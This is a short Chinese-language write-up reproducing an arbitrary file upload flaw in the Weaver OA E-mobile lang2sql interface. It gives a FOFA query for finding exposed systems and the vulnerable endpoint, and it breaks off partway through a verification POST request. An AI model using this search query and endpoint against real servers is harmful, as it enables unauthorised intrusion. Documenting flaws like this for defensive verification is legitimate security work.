泛微OA_lang2sql 任意文件上传漏洞复现

简介

泛微OA E-mobile系统 lang2sql接口存在任意文件上传漏洞，由于后端源码中没有对文件没有校验，导致任意文件上传。攻击者可利用该参数构造恶意数据包进行上传漏洞攻击。

漏洞复现

FOFA语法：

title="移动管理平台-企业管理"

页面访问如下：

影响的版本偏系统版本比较老一点的系统

POC：

/emp/lang2sql?client_type=1&lang_tag=1

拼接URL进行访问，不存在该文件可能返回404页面

该文件若存在可尝试进行利用验证

访问该文件存在页面如上

漏洞验证：

POST /emp/lang2sql?client_type=1&lang